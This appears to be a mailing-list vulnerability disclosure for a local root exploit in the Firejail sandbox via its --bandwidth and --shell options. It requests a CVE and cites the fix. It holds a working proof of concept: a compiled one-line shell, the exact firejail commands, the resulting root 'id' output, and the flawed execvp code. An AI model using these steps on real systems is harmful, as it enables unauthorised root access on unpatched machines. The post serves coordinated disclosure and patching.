Re: Re: Firejail local root exploit

[Martin Carpenter <mcarpenter () free fr>]

On Thu, 2017-01-05 at 23:37 +0100, Martin Carpenter wrote:
> A handful of concrete examples that I have reported are below.

Another (new) one: MITRE can you please assign a CVE?

6. Root shell via --bandwidth and --shell

Reported at:
https://github.com/netblue30/firejail/issues/1023

Fixed at:
  commit 5d43fdcd215203868d440ffc42036f5f5ffc89fc
  Author: netblue30 <netblue30 () yahoo com>
  Date:   Fri Jan 6 22:45:11 2017 -0500

      security fix


Quoting for list:

----8<----
[Against current HEAD, commit 64355]

In a first window run:

$ firejail --noprofile --name=x --net=eth0

In a second window, firstly create a dumb shell that ignores -c:

$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell -

and then secondly invoke that shell via the --shell and --bandwidth
flags to obtain root:

$ firejail --shell=./dumbshell --bandwidth=x status
# id
uid=0(root) gid=0(root)
groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),125(vboxusers),2000(wiki),10000(martin)
 context=system_u:system_r:initrc_t:s0

Error occurs at
https://github.com/netblue30/firejail/blob/6435525696e8eda2d1bc0ef50488523422b9126d/src/firejail/bandwidth.c#L445-L451

char *arg[4];
arg[0] = cfg.shell;
arg[1] = "-c";
arg[2] = cmd;
arg[3] = NULL;
clearenv();
execvp(arg[0], arg);

I don't see any good reason to permit a user-specified shell to run a
bandwidth command.
----8<----